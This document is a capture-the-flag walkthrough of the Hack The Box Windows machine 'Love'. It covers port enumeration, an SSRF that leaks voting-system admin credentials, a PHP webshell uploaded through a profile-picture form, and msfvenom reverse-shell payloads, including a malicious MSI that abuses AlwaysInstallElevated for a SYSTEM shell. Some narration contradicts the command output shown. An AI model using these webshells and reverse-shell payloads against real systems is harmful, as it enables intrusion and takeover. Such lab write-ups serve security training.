Love

Windows : Easy

10.10.10.239

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.239

80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

135/tcp  open  msrpc        Microsoft Windows RPC

139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn

443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1

445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)

3306/tcp open  mysql?
| fingerprint-strings: 
|   LPDString, TerminalServer, WMSRequest, giop: 
|_    Host '10.10.16.4' is not allowed to connect to this MariaDB server

5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=1/19%Time=65AB207E%P=x86_64-pc-linux-gnu%r
SF:(LPDString,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Termi
SF:nalServer,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(WMSReq
SF:uest,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(giop,49,"E\
SF:0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x
SF:20connect\x20to\x20this\x20MariaDB\x20server");
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|Longhorn|2008|7|2019|11|Vista|XP|8.1 (95%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (95%), Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8 (93%), Microsoft Windows 10 1709 - 1803 (93%), Microsoft Windows 10 1809 - 2004 (93%), Microsoft Windows 10 2004 (93%), Microsoft Windows Server 2019 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h01m34s, deviation: 4h37m10s, median: 21m32s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-01-19T17:45:25-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-01-20T01:45:22
|_  start_date: N/A

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.239    

123/udp  open|filtered ntp
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
500/udp  open|filtered isakmp
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
5050/udp open|filtered mmcc
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1138.51 seconds

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.239

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts    
10.10.10.239	love.htb

Enumeration: SMB Port 139/445/tcp

I’m not able to get a guest session with SMB:

┌──(kali💀kali)-[~/Desktop]
└─$ enum4linux -a 10.10.10.239

[E] Can't find workgroup/domain     
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.  

┌──(kali💀kali)-[~/Desktop]
└─$ smbmap -H 10.10.10.239

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)    


┌──(kali💀kali)-[~/Desktop]
└─$ smbmap -H 10.10.10.239 -u null

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)   

┌──(kali💀kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.239 -u '' -p '' --shares
SMB         10.10.10.239    445    LOVE             [*] Windows 10 Pro 19042 x64 (name:LOVE) (domain:Love) (signing:False) (SMBv1:True)
SMB         10.10.10.239    445    LOVE             [+] Love\: 
SMB         10.10.10.239    445    LOVE             [-] Error enumerating shares: STATUS_ACCESS_DENIED


┌──(kali💀kali)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.239 --shares
SMB         10.10.10.239    445    LOVE             [*] Windows 10 Pro 19042 x64 (name:LOVE) (domain:Love) (signing:False) (SMBv1:True)
SMB         10.10.10.239    445    LOVE             [-] Error enumerating shares: Could not get nt error code 91 from impacket: SMB SessionError: 0x5b

┌──(kali💀kali)-[~/Desktop]
└─$ smbclient -L //10.10.10.239 -N
session setup failed: NT_STATUS_ACCESS_DENIED

Check vulns:

┌──(kali💀kali)-[~]
└─$ nmap --script smb-vuln* -p139,445 -T4 -Pn 10.10.10.239

139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED

Enumeration: MSRPC Port 135/tcp

┌──(kali💀kali)-[~/Desktop]
└─$ rpcclient 10.10.10.239 -U ""

Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

┌──(kali💀kali)-[~]
└─$ nmap 10.10.10.239 --script=msrpc-enum

Host script results:
|_msrpc-enum: NT_STATUS_ACCESS_DENIED

msf > use exploit/windows/dcerpc/ms03_026_dcom

Enumeration: mysql Port 3306/tcp

MariaDB server

Connections from my IP are not allowed to MySQL:

┌──(kali💀kali)-[~/Desktop]
└─$ mysql -h 10.10.10.239
ERROR 1130 (HY000): Host '10.10.16.4' is not allowed to connect to this MariaDB server

Enumeration: Unknown Ports 5080 / 7680 /tcp

I wasn’t able to get anything useful out of 5080 or 7680:

curl 10.10.10.239:5080

nc 10.10.10.239 5080

curl 10.10.10.239:7680

nc 10.10.10.239 7680

Enumeration: HTTP Port 5000/tcp

The server on 5000 returns Forbidden as well:

Enumeration: HTTP Port 443/tcp

The site just returns a 403 forbidden:

https://10.10.10.239/ Apache httpd 2.4.46: (OpenSSL/1.1.1j PHP/7.3.27)

Tech Stack: The TLS certificate shows the domain love.htb and staging.love.htb:

Common Name: staging.love.htb Email Address: roy@love.htb Organization: ValentineCorp

There’s an email address for roy@love.htb. I’ll add both domains to /etc/hosts:

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts  
10.10.10.239    staging.love.htb

https://staging.love.htb/ Forbidden

Enumeration: HTTP Port 80/tcp

Both by IP and love.htb, the page returns a login form for a voting system The page title is “Voting System using PHP”. Some basic password guessing didn’t lead anywhere. No matter what I entered, it returned:

Basic SQL injections didn’t lead anywhere either.

Voting System: http://10.10.10.239/

VIEW SOURCE:

view-source:http://10.10.10.239/

SSL CERT:

WHATWEB:

┌──(kali💀kali)-[~]
└─$ whatweb -a3 https://10.10.10.239/ -v
WhatWeb report for https://10.10.10.239/
Status    : 403 Forbidden
Title     : 403 Forbidden
IP        : 10.10.10.239
Country   : RESERVED, ZZ

Summary   : Apache[2.4.46], HTTPServer[Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27], OpenSSL[1.1.1j], PHP[7.3.27]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.4.46 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 (from server string)

[ OpenSSL ]
        The OpenSSL Project is a collaborative effort to develop a 
        robust, commercial-grade, full-featured, and Open Source 
        toolkit implementing the Secure Sockets Layer (SSL v2/v3) 
        and Transport Layer Security (TLS v1) protocols as well as 
        a full-strength general purpose cryptography library. 

        Version      : 1.1.1j
        Website     : http://www.openssl.org/

[ PHP ]
        PHP is a widely-used general-purpose scripting language 
        that is especially suited for Web development and can be 
        embedded into HTML. This plugin identifies PHP errors, 
        modules and versions and extracts the local file path and 
        username if present. 

        Version      : 7.3.27
        Google Dorks: (2)
        Website     : http://www.php.net/

HTTP Headers:
        HTTP/1.1 403 Forbidden
        Date: Sat, 20 Jan 2024 02:33:46 GMT
        Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
        Content-Length: 303
        Connection: close
        Content-Type: text/html; charset=iso-8859-1

DIR BRUTE-FORE:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://love.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

/index.php            (Status: 200) [Size: 4388]
/images               (Status: 301) [Size: 330] [--> http://love.htb/images/]
/home.php             (Status: 302) [Size: 0] [--> index.php]
/login.php            (Status: 302) [Size: 0] [--> index.php]
/Images               (Status: 301) [Size: 330] [--> http://love.htb/Images/]
/admin                (Status: 301) [Size: 329] [--> http://love.htb/admin/]
/Home.php             (Status: 302) [Size: 0] [--> index.php]
/plugins              (Status: 301) [Size: 331] [--> http://love.htb/plugins/]
/includes             (Status: 301) [Size: 332] [--> http://love.htb/includes/]
/Index.php            (Status: 200) [Size: 4388]
/Login.php            (Status: 302) [Size: 0] [--> index.php]
/examples             (Status: 503) [Size: 398]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/preview.php          (Status: 302) [Size: 0] [--> index.php]
/dist                 (Status: 301) [Size: 328] [--> http://love.htb/dist/]
/licenses             (Status: 403) [Size: 417]
/IMAGES               (Status: 301) [Size: 330] [--> http://love.htb/IMAGES/]
/%20                  (Status: 403) [Size: 298]
/INDEX.php            (Status: 200) [Size: 4388]
/Admin                (Status: 301) [Size: 329] [--> http://love.htb/Admin/]
/*checkout*.txt       (Status: 403) [Size: 298]
/*checkout*.php       (Status: 403) [Size: 298]
/*checkout*           (Status: 403) [Size: 298]
/Plugins              (Status: 301) [Size: 331] [--> http://love.htb/Plugins/]
/phpmyadmin           (Status: 403) [Size: 298]
/HOME.php             (Status: 302) [Size: 0] [--> index.php]
/webalizer            (Status: 403) [Size: 298]
/Logout.php           (Status: 302) [Size: 0] [--> index.php]
/*docroot*            (Status: 403) [Size: 298]
/*docroot*.txt        (Status: 403) [Size: 298]
/*docroot*.php        (Status: 403) [Size: 298]
/*.txt                (Status: 403) [Size: 298]
/*.php                (Status: 403) [Size: 298]
/*                    (Status: 403) [Size: 298]
/Preview.php          (Status: 302) [Size: 0] [--> index.php]
/con.php              (Status: 403) [Size: 298]
/con.txt              (Status: 403) [Size: 298]
/con                  (Status: 403) [Size: 298]
/http%3A              (Status: 403) [Size: 298]
/http%3A.txt          (Status: 403) [Size: 298]
/http%3A.php          (Status: 403) [Size: 298]
/Includes             (Status: 301) [Size: 332] [--> http://love.htb/Includes/]
/**http%3a            (Status: 403) [Size: 298]
/**http%3a.php        (Status: 403) [Size: 298]
/**http%3a.txt        (Status: 403) [Size: 298]
/*http%3A.txt         (Status: 403) [Size: 298]
/*http%3A.php         (Status: 403) [Size: 298]
/*http%3A             (Status: 403) [Size: 298]

It returned a bunch of 403 forbiddens, and 301/302 redirects. I am most interested in /admin. Visiting presents another login form:

NIKTO:

┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.239

+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /: Retrieved x-powered-by header: PHP/7.3.27.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.4.46 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/1.1.1j appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ PHP/7.3.27 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /admin/: This might be interesting.
+ /includes/: Directory indexing found.
+ /includes/: This might be interesting.
+ /admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /Admin/: This might be interesting.

BURP:

POST /login.php HTTP/1.1
Host: love.htb
Content-Length: 33
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://love.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://love.htb/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qvuir2bbgb75nl7jojkr3cq6j2
Connection: close

voter=admin&password=admin&login=

SQLMAP:

I’ll run with -r login.request to give it the file to work from, --force-ssl (as that’s where the site is), and --batch to accept the defaults at the prompts. It finds four injections:

┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch

[21:34:18] [WARNING] POST parameter 'login' does not seem to be injectable
[21:34:18] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[21:34:18] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 219 times

I’ll add --dbs to the end of the command and run it again to list the dbs:

┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --dbs 

[21:39:08] [WARNING] POST parameter 'login' does not seem to be injectable
[21:39:08] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[21:39:08] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 218 times

I will list the tables in public, finding one:

sqlmap -r request --force-ssl --batch -D public --tables

I will dump a single user, admin, and their password hash. sqlmap tries to crack it but fails, and Google doesn’t know it either.

sqlmap -r request --force-ssl --batch -D public -T users --dump

The previous command identified the OS as Debian 10. Given this is a Windows host according to HTB, this must be in a Docker container. The id command returns as well:

┌──(kali💀kali)-[~/Desktop]
└─$ sqlmap -r request --force-ssl --batch --os-cmd id

sqlmap -r request --force-ssl --batch --os-shell

Searchsploit: While this looks potentially like an application developed for HTB, it actually isn’t. searchsploit returns three results:

┌──(kali💀kali)-[~]
└─$ searchsploit "voting system"

Online Voting System - Authentication Bypass                   | php/webapps/43967.py
Online Voting System 1.0 - Authentication Bypass (SQLi)        | php/webapps/50075.txt
Online Voting System 1.0 - Remote Code Execution (Authenticate | php/webapps/50076.txt
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remo | php/webapps/50088.py
Online Voting System Project in PHP - 'username' Persistent Cr | multiple/webapps/49159.txt
Voting System 1.0 - Authentication Bypass (SQLI)               | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated)    | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI  (Unauthenticated SQL inje | php/webapps/49817.txt
WordPress Plugin Poll_ Survey_ Questionnaire and Voting system | php/webapps/50052.txt

Clearly admin is a valid username. If I can’t find anything else, I can come back and check for more.

staging.love.htb - TCP 80 The staging.love.htb website is different. It’s a file scanning application:

In the nav bar at the top, Home leads to this page, but Demo goes to /beta.php, where there’s a form that takes a url:

If I start a Python webserver and enter a url hosted on my IP, it does make a request to my server:

http://staging.love.htb/beta.php

┌──(kali💀kali)-[~]
└─$ python3 -m http.server 80
10.10.10.239 - - [20/Jan/2024 05:44:58] "GET / HTTP/1.1" 200 -

http:10.10.16.4

The resulting page is contains the result:

Shell as phoebe

SSRF Getting the server to make a request and potentially access something I can’t access otherwise is known as a server-side request forgery (SSRF) exploit. While typically they are a bit more well disguised than a site that asks for for the url, using this to access things I shouldn’t have access to is SSRF all the same.

I tried entering https://127.0.0.1, but nothing returned. However, when I checked the service on 5000 by entering http://127.0.0.1:5000:

 Vote Admin Creds admin: @LoveIsInTheAir!!!! 

It seems to be giving creds for the Voting System, and they work.

RCE via Searchsploit Script

Having identified an authenticated RCE exploit in Voting System earlier in searchsploit, and now creds, ‘ll give that a try. searchsploit -m php/webapps/49445.py will copy it to my current working directory. It’s a Python script. At the top there’s some config info to update:

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m php/webapps/49445.py
  Exploit: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
      URL: https://www.exploit-db.com/exploits/49445
     Path: /usr/share/exploitdb/exploits/php/webapps/49445.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (6002)
Copied to: /home/kali/Desktop/49445.py

# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.16.4" # Reverse shell IP
REV_PORT = "8888" # Reverse port
# --------------------------------

┌──(kali💀kali)-[~/Desktop]
└─$ python 49445.py  
  File "49445.py", line 19
    INDEX_PAGE = f"http://{IP}/votesystem/admin/index.php"
                                                         ^
SyntaxError: invalid syntax

Troubleshooting: I ran the exploit, and nothing happened Looking at the Python script, it is using requests to send HTTP requests to the website. At the start, it creates a session, which will hold things like cookies to enable things like logging in. It stores it in the global variable s. I’ll add Burp as a proxy to that session so that I can see the requests it is sending and potentially see what’s wrong.

On running the script again, I see three requests, all of which are returning 404: It’s not finding any of those pages. Above, I found the admin login page at /admin/login.php, but for some reason this script is adding /votingsystem before that. Right under where I configured the settings, there’s a handful of URLs defined: I’ll remove /votingsystem from each and save the script.

RCE Manually

Once logged in, there’s not a ton to see: Clicking around the panels didn’t lead to anything interesting. However, clicking on the logged in user’s name, Neovic Devierte, there’s an option to update: Clicking that brings up a form to update the admin profile:

http://love.htb/admin/home.php admin @LoveIsInTheAir!!!!

The profile picture is the first target that comes to mind, as it’s the chance to upload something. It looks like zero filtering is in place, as if I just select a simple PHP webshell and upload it as cmd.php, it doesn’t complain.

<?php system($_REQUEST["cmd"]); ?>

The image is now broken at the top: Looking at the source for the page, it saved the file as cmd.php: Visiting http://love.htb/images/cmd.php returns an error about missing cmd: Notice: Undefined index: cmd in C:\xampp\htdocs\omrs\images\shell.php on line 1 Warning: system(): Cannot execute a blank command in C:\xampp\htdocs\omrs\images\shell.php on line 1

Adding ?cmd=whoami to the end shows I have execution:

http://love.htb/images/shell.php?cmd=whoami
love\phoebe 

Reverse Shell:

I used the credintials to login as an admin, and after some search I found file upload vulnerability which I used to upload my both shell.php

┌──(kali💀kali)-[~/Desktop]
└─$ nano shell.php 
<?php system($_REQUEST["cmd"]); ?>

and shell.exe that was generated via msfconsole

┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=2560 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

I activated exploit/multi/handler

┌──(kali💀kali)-[~]
└─$ msfconsole  

msf6 > use exploit/multi/handler 

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST tun0

msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 10.10.16.4:4444 
[*] Sending stage (175686 bytes) to 10.10.10.239
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.10.10.239:52801) at 2024-01-20 08:02:10 -0500

meterpreter > whoami
[-] Unknown command: whoami

meterpreter > shell
Process 552 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
love\phoebe

C:\xampp\htdocs\omrs\images>cd C:\Users\Phoebe\Desktop

C:\Users\Phoebe\Desktop>type user.txt
type user.txt
11fe5539e57b18f---------------------

Shell as SYSTEM

Enumeration After looking around the filesystem a bit manually, I opted to run WinPEAS. After cloning the repo to my VM, I went into the directory with winPEAS.exe and started a Python web server (python3 -m http.server 80).

https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exegithub.com

C:\Administration>cd C:\ProgramData
C:\ProgramData>
C:\ProgramData>powershell wget http://10.10.16.4:5555/winPEA.exe -outfile wp.exe

There’s a hit on the webserver, and the file is present. Now I’ll run it with .\wp.exe. There’s a ton of output, so I’ll just highlight the interesting parts.

C:\ProgramData>dir
 Directory of C:\ProgramData

07/10/2015  03:04 AM    <DIR>          Comms
11/18/2020  11:45 PM    <DIR>          Microsoft OneDrive
04/21/2021  06:58 AM    <DIR>          Package Cache
04/13/2021  07:40 AM    <DIR>          Packages
01/19/2024  05:42 PM    <DIR>          regid.1991-06.com.microsoft
12/07/2019  01:14 AM    <DIR>          SoftwareDistribution
11/18/2020  06:54 PM    <DIR>          ssh
04/12/2021  12:14 PM    <DIR>          USOPrivate
12/07/2019  01:14 AM    <DIR>          USOShared
04/21/2021  09:02 AM    <DIR>          VMware
12/07/2019  01:52 AM    <DIR>          WindowsHolographicDevices
01/20/2024  06:46 AM         2,234,880 wp.exe

C:\ProgramData>.\wp.exe

It finds a PowerShell history file:

          ͹ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.19041.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Being able to create directories at the C:\ root is interesting.

[+] Drives Information
   [?] Remember that you should search more info inside the other drives
    C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 3 GB)(Permissions: Authenticated Users [AppendData/CreateDirectories])  


          ͹ Display information about local users
   Computer Name           :   LOVE
   User Name               :   Administrator
   User Id                 :   500
   Is Enabled              :   True
   User Type               :   Administrator
   Comment                 :   Built-in account for administering the computer/domain
   Last Logon              :   1/20/2024 6:47:33 AM
   Logons Count            :   737
   Password Last Set       :   4/12/2021 12:24:41 PM

   =================================================================================================                                                                                              

   Computer Name           :   LOVE
   User Name               :   DefaultAccount
   User Id                 :   503
   Is Enabled              :   False
   User Type               :   Guest
   Comment                 :   A user account managed by the system.
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                                              

   Computer Name           :   LOVE
   User Name               :   Guest
   User Id                 :   501
   Is Enabled              :   False
   User Type               :   Guest
   Comment                 :   Built-in account for guest access to the computer/domain
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================                                                                                              

   Computer Name           :   LOVE
   User Name               :   Phoebe
   User Id                 :   1002
   Is Enabled              :   True
   User Type               :   User
   Comment                 :   Workstation Power User
   Last Logon              :   1/19/2024 5:42:44 PM
   Logons Count            :   23
   Password Last Set       :   4/12/2021 11:54:30 AM

   =================================================================================================                                                                                              

   Computer Name           :   LOVE
   User Name               :   WDAGUtilityAccount
   User Id                 :   504
   Is Enabled              :   False
   User Type               :   Guest
   Comment                 :   A user account managed and used by the system for Windows Defender Application Guard scenarios.
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   4/12/2021 12:10:32 PM

AlwaysInstallElevated: These registry keys tell windows that a user of any privilege can install .msi files are NT AUTHORITY\SYSTEM. So all I need to do is create a malicious .msi file, and run it.

I’ll use msfvenon to create the MSI installer. I did show this process manually for Ethereal, but it’s a painful process, and msfvenom will work here. I’ll use a reverse shell payload that I can catch with nc:

┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=443 -f msi -o rev.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: rev.msi

I’ll upload it just like I did with WinPEAS:

C:\ProgramData> powershell wget http://10.10.16.4:5555/rev1.msi -outfile rev.msi

This requests the file from my Python webserver (now running out of my love directory) and fetches the MSI.

C:\ProgramData>.\rev.msi

This returns nothing, but there’s a shell at my listening nc:

┌──(kali💀kali)-[~]
└─$ rlwrap nc -lnvp 443

connect to [10.10.16.4] from (UNKNOWN) [10.10.10.239] 52812
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

C:\WINDOWS\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> dir
 Directory of C:\Users\Administrator\Desktop
04/13/2021  02:20 AM    <DIR>          .
04/13/2021  02:20 AM    <DIR>          ..
01/19/2024  05:43 PM                34 root.txt

C:\Users\Administrator\Desktop> type root.txt
6369eb24d114e591---------------------